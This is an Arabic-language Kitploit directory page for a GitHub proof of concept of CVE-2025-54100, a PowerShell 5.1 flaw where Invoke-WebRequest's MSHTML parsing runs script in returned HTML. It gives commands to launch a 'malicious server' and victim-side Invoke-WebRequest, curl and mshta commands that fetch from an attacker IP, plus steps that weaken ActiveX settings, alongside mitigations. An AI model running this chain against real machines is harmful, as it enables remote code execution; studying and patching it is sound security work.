Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/xiaolvchen/cve-2025-54100
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubxiaolvchen/cve-2025-54100

CVE-2025-54100

CVE-2025-54100(ثغرة تنفيذ تعليمات برمجية عن بُعد في PowerShell)

عرض المستودع
1منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-54100 – PowerShell إثبات المفهوم لتحليل الاستجابة

يوضح كيف يؤدي تحليل HTML الضار لـ CVE-2025-54100 إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) في Windows PowerShell 5.1.

ما هو CVE-2025-54100؟

نوع الثغرة: خطر حقن الأوامر عند عدم استخدام Invoke-WebRequest لمعامل -UseBasicParsing

مستوى الخطورة: CVSS 7.8 (عالي)

السبب الجذري: تحليل استجابات HTML القائم على MSHTML يسمح بتنفيذ البرامج النصية (مثل ActiveXObject) وتشغيلها في سياق المستدعي

الأنظمة المتأثرة:

  • Windows 10 / 11
  • Windows Server 2008–2025
  • PowerShell 5.1

آلية عمل إثبات المفهوم

  1. يقوم خادم FastAPI في CVE-2025-54100.py بإرجاع حمولة HTML مصممة بعناية
  2. تحاول البرامج النصية في HTML إنشاء كائنات ActiveX مثل WScript.Shell / Shell.Application
  3. على الأجهزة المعرضة للثغرة، يقوم محلل MSHTML بتنفيذ البرنامج النصي، مما يؤدي إلى تشغيل calc.exe لإظهار تنفيذ التعليمات البرمجية عن بُعد
  4. الحمولة المقدمة مصغرة وغير ضارة، وتستخدم فقط للبحث والتحقق، ويمكن توسيعها حسب الحاجة لمزيد من التحليل

بدء سريع

المتطلبات

  • Python 3.10+ (تم اختباره مع FastAPI و Uvicorn)
  • تثبيت التبعيات
    root@kitploit:~
    python3 -m venv .venv
    source .venv/bin/activate
    pip3 install -r requirements.txt
    

تشغيل الخادم الضار

ابدأ خدمة HTTP لإثبات المفهوم:

root@kitploit:~
uvicorn app:app --host 0.0.0.0  --port 8888 --reload

التشغيل من الجهاز الضحية

على جهاز Windows المعرض للثغرة، لا تستخدم -UseBasicParsing، قم بتنفيذ الأوامر التالية:

root@kitploit:~
# Invoke-WebRequest
Invoke-WebRequest -Uri "http://192.168.26.16:8888"
# curl (اسم مستعار في PowerShell)
curl http://192.168.26.16:8888
# mshta
mshta http://192.168.26.16:8888

تأكد من تطابق المنفذ مع تكوين الخادم. إذا كان النظام معرضًا للثغرة، سيتم تنفيذ البرنامج النصي المضمن عبر محلل MSHTML.

ملاحظة: قد تقوم بعض برامج مكافحة الفيروسات باعتراض هذا السلوك، حتى لو كانت ثغرة التحليل لا تزال قائمة.

استكشاف الأخطاء والتحقق

  1. إذا لم يظهر calc.exe:
    1. افتح خيارات الإنترنت على الجهاز الضحية
    2. انتقل إلى الأمان → المستوى المخصص
    3. قم بتمكين “تهيئة وبرمجة عناصر تحكم ActiveX غير المميزة كآمنة”
    4. أعد تنفيذ Invoke-WebRequest دون استخدام -UseBasicParsing

تُستخدم هذه الخطوة للتحقق من متجه التنفيذ. في سيناريوهات الهجوم الحقيقية، قد يستخدم المهاجمون تقنيات التعتيم أو الالتفاف لتجاوز القيود الأمنية الافتراضية.

دليل التحقق

PoC

الإجراءات التخفيفية

قامت Microsoft بإصلاح الثغرة في ديسمبر 2025:

  1. تثبيت تحديثات أمان Windows في الوقت المناسب

  2. استخدم دائمًا -UseBasicParsing، لتجنب تحليل MSHTML:

    root@kitploit:~
    Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing
    
  3. الانتقال إلى PowerShell 7+ (pwsh)، لم يعد PowerShell Core يعتمد على MSHTML في التحليل، مما يتجنب المشكلة من الناحية المعمارية.

المراجع

  • NVD: CVE-2025-54100
  • MSRC: Update Guide
  • GitHub: osman1337-security/CVE-2025-54100
تنزيل الأداة